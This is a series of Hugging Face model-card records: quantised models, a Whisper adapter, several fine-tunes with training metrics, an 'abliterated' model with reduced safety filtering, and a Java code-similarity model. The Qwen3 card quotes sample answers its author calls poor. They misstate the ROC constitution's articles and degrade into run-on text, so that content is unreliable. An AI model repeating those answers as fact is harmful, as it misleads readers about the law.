Infrastructure #### Hardware Dual NVIDIA RTX 4090 GPUs #### Software - Hugging Face transformers library (version 4.49.0.dev0) - hy-models library (https://github.com/MMinasyan/hy-models) ## Model Card Contact [email protected]
RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf
RichardErkhov
2025-06-11T10:47:32Z
0
0
null
[ "gguf", "endpoints_compatible", "region:us", "conversational" ]
null
2025-06-11T08:37:20Z
Quantization made by Richard Erkhov. [Github](https://github.com/RichardErkhov) [Discord](https://discord.gg/pvy7H8DZMG) [Request more models](https://github.com/RichardErkhov/quant_request) potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer - GGUF - Model creator: https://huggingface.co/suehyunpark/ - Original model: https://huggingface.co/suehyunpark/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer/ | Name | Quant method | Size | | ---- | ---- | ---- | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q2_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q2_K.gguf) | Q2_K | 2.96GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ3_XS.gguf) | IQ3_XS | 3.28GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ3_S.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ3_S.gguf) | IQ3_S | 3.43GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q3_K_S.gguf) | Q3_K_S | 3.41GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ3_M.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ3_M.gguf) | IQ3_M | 3.52GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q3_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q3_K.gguf) | Q3_K | 3.74GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q3_K_M.gguf) | Q3_K_M | 3.74GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q3_K_L.gguf) | Q3_K_L | 4.03GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ4_XS.gguf) | IQ4_XS | 4.18GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_0.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_0.gguf) | Q4_0 | 4.34GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ4_NL.gguf) | IQ4_NL | 4.38GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_K_S.gguf) | Q4_K_S | 4.37GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_K.gguf) | Q4_K | 4.58GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_K_M.gguf) | Q4_K_M | 4.58GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_1.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_1.gguf) | Q4_1 | 4.78GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_0.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_0.gguf) | Q5_0 | 5.21GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_K_S.gguf) | Q5_K_S | 5.21GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_K.gguf) | Q5_K | 5.34GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_K_M.gguf) | Q5_K_M | 5.34GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_1.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_1.gguf) | Q5_1 | 5.65GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q6_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q6_K.gguf) | Q6_K | 6.14GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q8_0.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q8_0.gguf) | Q8_0 | 7.95GB | Original model description: --- base_model: barc0/Llama-3.1-ARC-Potpourri-Induction-8B datasets: - suehyunpark/induction_arc_inputs_train_bc_trajectories_max10-per-task_check_answer library_name: transformers model_name: barc0/Llama-3.1-ARC-Potpourri-Induction-8B tags: - generated_from_trainer - alignment-handbook - trl - sft licence: license --- # Model Card for barc0/Llama-3.1-ARC-Potpourri-Induction-8B This model is a fine-tuned version of [barc0/Llama-3.1-ARC-Potpourri-Induction-8B](https://huggingface.co/barc0/Llama-3.1-ARC-Potpourri-Induction-8B) on the [['suehyunpark/induction_arc_inputs_train_bc_trajectories_max10-per-task_check_answer']](https://huggingface.co/datasets/['suehyunpark/induction_arc_inputs_train_bc_trajectories_max10-per-task_check_answer']) dataset. It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="suehyunpark/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure [<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/suehyun/arc-improve/runs/4y71yzaa) This model was trained with SFT. ### Framework versions - TRL: 0.12.1 - Transformers: 4.46.2 - Pytorch: 2.5.1 - Datasets: 3.1.0 - Tokenizers: 0.20.3 ## Citations Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
Bruno7/ksa-whisper
Bruno7
2025-06-11T10:45:44Z
0
0
transformers
[ "transformers", "safetensors", "automatic-speech-recognition", "speech", "audio", "transformers- peft", "lora", "adapter", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
automatic-speech-recognition
2025-06-11T10:33:04Z
--- language: en license: apache-2.0 tags: - automatic-speech-recognition - speech - audio - transformers- peft - lora - adapter library_name: transformers pipeline_tag: automatic-speech-recognition --- # Bruno7/ksa-whisper ## Model Description Arabic Whisper PEFT adapter for Saudi dialect ## Base Model This adapter is designed to work with: `openai/whisper-large-v3` ## Usage ```python from transformers import pipeline from peft import PeftModel, PeftConfig # Load the adapter configuration config = PeftConfig.from_pretrained("Bruno7/ksa-whisper") # Load base model and apply adapter pipe = pipeline( "automatic-speech-recognition", model=config.base_model_name_or_path, device="cuda" if torch.cuda.is_available() else "cpu" ) # Load and apply the adapter model = PeftModel.from_pretrained(pipe.model, "Bruno7/ksa-whisper") pipe.model = model # Process audio result = pipe("path_to_audio.wav") print(result["text"]) ``` ### Alternative Usage (Direct Loading) ```python from transformers import AutoProcessor, AutoModelForSpeechSeq2Seq from peft import PeftModel # Load base model and processor processor = AutoProcessor.from_pretrained("openai/whisper-large-v3") model = AutoModelForSpeechSeq2Seq.from_pretrained("openai/whisper-large-v3") # Apply adapter model = PeftModel.from_pretrained(model, "Bruno7/ksa-whisper") # Your inference code here ``` ## Model Architecture This is a PEFT (Parameter-Efficient Fine-Tuning) adapter model that modifies a base Whisper model for improved performance on specific domains or languages. The adapter uses LoRA (Low-Rank Adaptation) techniques to efficiently fine-tune the model while keeping the parameter count minimal. ## Inference This adapter can be applied to the base model for domain-specific speech recognition tasks. ## Limitations - Requires the base model to be loaded separately - Performance may vary with different audio qualities and accents - Requires audio preprocessing for optimal results
TrinhHoangKhang/LLama8B_firstModel
TrinhHoangKhang
2025-06-11T10:44:04Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "llama", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:43:57Z
--- base_model: unsloth/meta-llama-3.1-8b-unsloth-bnb-4bit tags: - text-generation-inference - transformers - unsloth - llama - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** TrinhHoangKhang - **License:** apache-2.0 - **Finetuned from model :** unsloth/meta-llama-3.1-8b-unsloth-bnb-4bit This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
johannawawi/model-for-sosmed-analysis-v3
johannawawi
2025-06-11T10:41:53Z
0
0
transformers
[ "transformers", "safetensors", "roberta", "text-classification", "generated_from_trainer", "base_model:w11wo/indonesian-roberta-base-sentiment-classifier", "base_model:finetune:w11wo/indonesian-roberta-base-sentiment-classifier", "license:mit", "autotrain_compatible", "endpoints_compatible", "region:us" ]
text-classification
2025-06-11T10:41:21Z
--- library_name: transformers license: mit base_model: w11wo/indonesian-roberta-base-sentiment-classifier tags: - generated_from_trainer metrics: - accuracy model-index: - name: results_final results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # results_final This model is a fine-tuned version of [w11wo/indonesian-roberta-base-sentiment-classifier](https://huggingface.co/w11wo/indonesian-roberta-base-sentiment-classifier) on the None dataset. It achieves the following results on the evaluation set: - Loss: 0.3752 - Accuracy: 0.8933 - F1 Macro: 0.8932 - F1 Weighted: 0.8932 - Precision Macro: 0.8952 - Recall Macro: 0.8933 - Precision Weighted: 0.8953 - Recall Weighted: 0.8933 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 3e-06 - train_batch_size: 8 - eval_batch_size: 8 - seed: 42 - optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: cosine - lr_scheduler_warmup_ratio: 0.1 - num_epochs: 10 - mixed_precision_training: Native AMP ### Training results | Training Loss | Epoch | Step | Validation Loss | Accuracy | F1 Macro | F1 Weighted | Precision Macro | Recall Macro | Precision Weighted | Recall Weighted | |:-------------:|:------:|:----:|:---------------:|:--------:|:--------:|:-----------:|:---------------:|:------------:|:------------------:|:---------------:| | 0.3425 | 0.3436 | 100 | 0.3619 | 0.8898 | 0.8897 | 0.8897 | 0.8910 | 0.8898 | 0.8911 | 0.8898 | | 0.4442 | 0.6873 | 200 | 0.3535 | 0.8864 | 0.8863 | 0.8863 | 0.8869 | 0.8864 | 0.8869 | 0.8864 | | 0.2777 | 1.0309 | 300 | 0.3620 | 0.8864 | 0.8863 | 0.8863 | 0.8878 | 0.8864 | 0.8878 | 0.8864 | | 0.314 | 1.3746 | 400 | 0.3739 | 0.8881 | 0.8879 | 0.8879 | 0.8894 | 0.8881 | 0.8894 | 0.8881 | | 0.3447 | 1.7182 | 500 | 0.3637 | 0.8881 | 0.8880 | 0.8880 | 0.8888 | 0.8881 | 0.8888 | 0.8881 | | 0.3629 | 2.0619 | 600 | 0.3581 | 0.8916 | 0.8915 | 0.8915 | 0.8929 | 0.8916 | 0.8929 | 0.8916 | | 0.3789 | 2.4055 | 700 | 0.3611 | 0.8898 | 0.8898 | 0.8898 | 0.8904 | 0.8898 | 0.8905 | 0.8898 | | 0.3392 | 2.7491 | 800 | 0.3609 | 0.8898 | 0.8898 | 0.8898 | 0.8909 | 0.8899 | 0.8910 | 0.8898 | | 0.3829 | 3.0928 | 900 | 0.3506 | 0.8881 | 0.8881 | 0.8881 | 0.8886 | 0.8881 | 0.8886 | 0.8881 | | 0.2468 | 3.4364 | 1000 | 0.3752 | 0.8933 | 0.8932 | 0.8932 | 0.8952 | 0.8933 | 0.8953 | 0.8933 | | 0.3509 | 3.7801 | 1100 | 0.3634 | 0.8864 | 0.8863 | 0.8863 | 0.8874 | 0.8864 | 0.8875 | 0.8864 | | 0.3282 | 4.1237 | 1200 | 0.3657 | 0.8881 | 0.8880 | 0.8880 | 0.8886 | 0.8881 | 0.8886 | 0.8881 | | 0.2847 | 4.4674 | 1300 | 0.3732 | 0.8881 | 0.8880 | 0.8880 | 0.8891 | 0.8881 | 0.8891 | 0.8881 | | 0.3151 | 4.8110 | 1400 | 0.3674 | 0.8864 | 0.8863 | 0.8863 | 0.8869 | 0.8864 | 0.8869 | 0.8864 | | 0.3468 | 5.1546 | 1500 | 0.3666 | 0.8847 | 0.8846 | 0.8846 | 0.8853 | 0.8847 | 0.8853 | 0.8847 | | 0.3638 | 5.4983 | 1600 | 0.3628 | 0.8864 | 0.8863 | 0.8863 | 0.8869 | 0.8864 | 0.8869 | 0.8864 | | 0.2822 | 5.8419 | 1700 | 0.3695 | 0.8864 | 0.8863 | 0.8863 | 0.8870 | 0.8864 | 0.8870 | 0.8864 | | 0.334 | 6.1856 | 1800 | 0.3582 | 0.8898 | 0.8898 | 0.8898 | 0.8903 | 0.8898 | 0.8903 | 0.8898 | | 0.3056 | 6.5292 | 1900 | 0.3608 | 0.8864 | 0.8863 | 0.8863 | 0.8869 | 0.8864 | 0.8869 | 0.8864 | | 0.2803 | 6.8729 | 2000 | 0.3663 | 0.8847 | 0.8846 | 0.8846 | 0.8853 | 0.8847 | 0.8853 | 0.8847 | | 0.312 | 7.2165 | 2100 | 0.3665 | 0.8864 | 0.8863 | 0.8863 | 0.8872 | 0.8864 | 0.8872 | 0.8864 | | 0.3847 | 7.5601 | 2200 | 0.3659 | 0.8847 | 0.8846 | 0.8846 | 0.8853 | 0.8847 | 0.8853 | 0.8847 | | 0.324 | 7.9038 | 2300 | 0.3662 | 0.8847 | 0.8846 | 0.8846 | 0.8853 | 0.8847 | 0.8853 | 0.8847 | | 0.3489 | 8.2474 | 2400 | 0.3643 | 0.8864 | 0.8863 | 0.8863 | 0.8869 | 0.8864 | 0.8869 | 0.8864 | | 0.3097 | 8.5911 | 2500 | 0.3647 | 0.8864 | 0.8863 | 0.8863 | 0.8869 | 0.8864 | 0.8869 | 0.8864 | | 0.2928 | 8.9347 | 2600 | 0.3653 | 0.8864 | 0.8863 | 0.8863 | 0.8869 | 0.8864 | 0.8869 | 0.8864 | | 0.365 | 9.2784 | 2700 | 0.3655 | 0.8864 | 0.8863 | 0.8863 | 0.8869 | 0.8864 | 0.8869 | 0.8864 | | 0.2417 | 9.6220 | 2800 | 0.3655 | 0.8864 | 0.8863 | 0.8863 | 0.8869 | 0.8864 | 0.8869 | 0.8864 | | 0.2933 | 9.9656 | 2900 | 0.3655 | 0.8864 | 0.8863 | 0.8863 | 0.8869 | 0.8864 | 0.8869 | 0.8864 | ### Framework versions - Transformers 4.52.4 - Pytorch 2.6.0+cu124 - Datasets 2.14.4 - Tokenizers 0.21.1
CSLin3303/qwen3-20250611002
CSLin3303
2025-06-11T10:41:06Z
0
0
null
[ "gguf", "qwen3", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:11:34Z
這個是使用unsloth/Qwen3-14B-Base-unsloth-bnb-4bit,沒有用推理的情節 這個訓練效果不好 回應如下: Q: 請描述中華民國憲法第5條的內容? A: 此外,當國家機器運作不順或產生爭議時,應該如何解決? 中華民國憲法第5條規定:「本憲法之解釋權屬於司法院大法官會議。」這意味著當對憲法有不同解讀或爭議時,最 終的解釋權歸屬於由司法院選出的大法官們組成的會議。 至於國家機器運作不順或產生爭議時,應按照法律程序進行處理。具體來說: 1. **行政糾紛**:若涉及政府機關之間的事務衝突,通常會先通過內部協調解決;如果無法達成共識,則可依《行 政訴訟法》提起訴願或行政訴訟。 2. **立法爭議**:對於法律草案的制定、修改等問題,應在立法院內進行充分討論和辯論。必要時可以召開聯席會 議,邀請相關部會代表參與,以求達成共識。 3. **司法審查**:當行政或立法行為涉嫌違憲時,可向司法院大法官提出釋憲請求。經由司法院解釋後,若判定該 法律條文確實違反憲法精神,則須予以修訂。 透過這些機制來保障民主運作、維持國家穩定發展及社會秩序和諧。 Q:『中華民國各民族一律平等。』是那一條中華民國憲法 A: 的規定?請為此條款之解釋? 這一表述出自於《中華民國憲法》第7條:「本憲法所稱國家,是指包括其領土、人民及政府在內之整個政治實體。 」雖然這裡並未直接提到各民族一律平等,但基於這句話的精神——即每個人都應該受到尊重和保護,無論他們屬於 哪個族群或文化背景。 因此,《中華民國憲法》第7條暗示著所有居住在我們國家裡的人(不分種族、性別或其他因素)都享有相同的權利 與自由。換言之,在我們這個共同體中生活工作學習玩耍的朋友們,彼此之間應該相互尊重理解包容支持幫助鼓勵 分享愛護信任友誼合作創新進步安全幸福健康快樂成長成功實現理想夢想追求美好生活 --- --- base_model: unsloth/Qwen3-14B-Base-unsloth-bnb-4bit tags: - text-generation-inference - transformers - unsloth - qwen3 - gguf license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** CSLin3303 - **License:** apache-2.0 - **Finetuned from model :** unsloth/Qwen3-14B-Base-unsloth-bnb-4bit This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
Triangle104/Homunculus-abliterated-Q4_K_S-GGUF
Triangle104
2025-06-11T10:41:06Z
0
0
transformers
[ "transformers", "gguf", "distillation", "/think", "/nothink", "reasoning-transfer", "arcee-ai", "chat", "abliterated", "uncensored", "llama-cpp", "gguf-my-repo", "en", "base_model:huihui-ai/Homunculus-abliterated", "base_model:quantized:huihui-ai/Homunculus-abliterated", "license:apache-2.0", "endpoints_compatible", "region:us", "conversational" ]
null
2025-06-11T10:40:33Z
--- language: - en license: apache-2.0 library_name: transformers base_model: huihui-ai/Homunculus-abliterated tags: - distillation - /think - /nothink - reasoning-transfer - arcee-ai - chat - abliterated - uncensored - llama-cpp - gguf-my-repo extra_gated_prompt: '**Usage Warnings** “**Risk of Sensitive or Controversial Outputs**“: This model’s safety filtering has been significantly reduced, potentially generating sensitive, controversial, or inappropriate content. Users should exercise caution and rigorously review generated outputs. “**Not Suitable for All Audiences**:“ Due to limited content filtering, the model’s outputs may be inappropriate for public settings, underage users, or applications requiring high security. “**Legal and Ethical Responsibilities**“: Users must ensure their usage complies with local laws and ethical standards. Generated content may carry legal or ethical risks, and users are solely responsible for any consequences. “**Research and Experimental Use**“: It is recommended to use this model for research, testing, or controlled environments, avoiding direct use in production or public-facing commercial applications. “**Monitoring and Review Recommendations**“: Users are strongly advised to monitor model outputs in real-time and conduct manual reviews when necessary to prevent the dissemination of inappropriate content. “**No Default Safety Guarantees**“: Unlike standard models, this model has not undergone rigorous safety optimization. huihui.ai bears no responsibility for any consequences arising from its use.' --- # Triangle104/Homunculus-abliterated-Q4_K_S-GGUF This model was converted to GGUF format from [`huihui-ai/Homunculus-abliterated`](https://huggingface.co/huihui-ai/Homunculus-abliterated) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/huihui-ai/Homunculus-abliterated) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo Triangle104/Homunculus-abliterated-Q4_K_S-GGUF --hf-file homunculus-abliterated-q4_k_s.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo Triangle104/Homunculus-abliterated-Q4_K_S-GGUF --hf-file homunculus-abliterated-q4_k_s.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo Triangle104/Homunculus-abliterated-Q4_K_S-GGUF --hf-file homunculus-abliterated-q4_k_s.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo Triangle104/Homunculus-abliterated-Q4_K_S-GGUF --hf-file homunculus-abliterated-q4_k_s.gguf -c 2048 ```
buelfhood/SOCO-Java-CodeT5Small-ST
buelfhood
2025-06-11T10:39:12Z
0
0
sentence-transformers
[ "sentence-transformers", "safetensors", "t5", "sentence-similarity", "feature-extraction", "generated_from_trainer", "dataset_size:33411", "loss:BatchAllTripletLoss", "arxiv:1908.10084", "arxiv:1703.07737", "base_model:Salesforce/codet5-small", "base_model:finetune:Salesforce/codet5-small", "autotrain_compatible", "endpoints_compatible", "region:us" ]
sentence-similarity
2025-06-11T10:38:58Z
--- tags: - sentence-transformers - sentence-similarity - feature-extraction - generated_from_trainer - dataset_size:33411 - loss:BatchAllTripletLoss base_model: Salesforce/codet5-small widget: - source_sentence: "\n\nimport java.net.*;\nimport java.io.*;\nimport java.util.*;\n\ \npublic class WatchDog extends TimerTask{\n\n private static URL location;\n\ \ private static String email;\n private static int checktime;\n private static\ \ Timer timer = new Timer();\n private BufferedReader input;\n private File\ \ checksumFile = new File(\"chksum.txt\");\n private File temp0000File = new\ \ File(\"temp0000\");\n private File kept0000File = new File(\"kept0000\");\n\ \n \n\n public WatchDog(){\n timer.schedule(this, new Date(), checktime);\n\ \ }\n\n\n \n\n public void run(){\n Vector imageFiles = new\ \ Vector();\n Vector diffImages = new Vector();\n try {\n \ \ System.out.println(\" Time: \".concat(new Date().toString()));\n \ \ System.out.println(\"Retreiving File\");\n \n input = new\ \ BufferedReader(new InputStreamReader\n (location.openStream()));\n\ \ \n BufferedWriter outputFile = new BufferedWriter\n \ \ (new FileWriter(temp0000File));\n String line = input.readLine();\n\ \ while (line != null) {\n StringBuffer imageFileName = new\ \ StringBuffer();\n if (scanForImages(line, imageFileName)) {\n \ \ String imageFile = new String(imageFileName);\n System.out.println(\"\ Detected image: \".concat(imageFile));\n try {\n imageFiles.add(new\ \ URL(imageFile));\n }\n catch (MalformedURLException\ \ e) {\n System.out.println(\"Image file detected. URL is malformed\"\ );\n }\n }\n outputFile.write(line);\n \ \ outputFile.write(\"\\n\");\n line = input.readLine();\n \ \ }\n input.print();\n outputFile.flush();\n \ \ outputFile.print();\n System.out.println(\" File Retreived\");\n \ \ if (!imageFiles.isEmpty()) {\n checkImages(imageFiles, diffImages);\n\ \ }\n if (!checksumFile.exists()) {\n generateChecksum(temp0000File.getName(),\ \ checksumFile);\n }\n else {\n if (!checksumOk(checksumFile))\ \ {\n reportDifferences(true, temp0000File, kept0000File, diffImages);\n\ \ generateChecksum(temp0000File.getName(), checksumFile);\n \ \ }\n else if (!diffImages.isEmpty()){\n reportDifferences(false,\ \ null, null, diffImages);\n }\n }\n\n \n \ \ temp0000File.renameTo(kept0000File);\n System.out.println(\"End Time:\ \ \".concat(new Date().toString()));\n }\n catch (MalformedURLException\ \ e) {\n e.printStackTrace();\n }\n catch (ConnectException\ \ e) {\n System.out.println(\"Failed connect\");\n System.exit(-1);\n\ \ }\n catch (IOException e) {\n e.printStackTrace();\n\ \ System.exit(-1);\n }\n }\n\n \n\n public boolean\ \ scanForImages(String line, StringBuffer imageFileName) {\n \n \ \ \n String lineIgnoreCase = line.toLowerCase();\n int imgPos =\ \ lineIgnoreCase.indexOf(\"<img \");\n if ( imgPos != -1 ){\n \ \ int srcPos = lineIgnoreCase.indexOf(\"src\", imgPos);\n int bracketPos\ \ = lineIgnoreCase.indexOf(\">\", imgPos);\n if (srcPos != -1 && bracketPos\ \ != -1 && srcPos < bracketPos) {\n int quote1Pos = lineIgnoreCase.indexOf(\"\ \\\"\", srcPos);\n int quote2Pos = lineIgnoreCase.indexOf(\"\\\"\"\ , quote1Pos+1);\n if (quote1Pos != -1 && quote2Pos != -1 &&\n \ \ quote1Pos < quote2Pos && quote2Pos < bracketPos) {\n \ \ \n imageFileName.append(line.substring(quote1Pos + 1,\n \ \ quote2Pos));\n if (imageFileName.indexOf(\"//\") == -1\ \ ) {\n \n String URLName = location.toString();\n\ \ int slashPos = URLName.lastIndexOf(\"/\");\n URLName\ \ = URLName.substring(0, slashPos);\n String HostName = \"http://\"\ .concat(location.getHost());\n if (imageFileName.indexOf(\"//\"\ ) == 0) {\n \n }\n else if (imageFileName.charAt(0)\ \ != '/') {\n \n imageFileName.insert(0, URLName.concat(\"\ /\"));\n }\n else {\n \n \ \ imageFileName.insert(0, HostName);\n }\n \ \ }\n return true;\n }\n }\n }\n \ \ return false;\n }\n\n \n\n public void checkImages(Vector\ 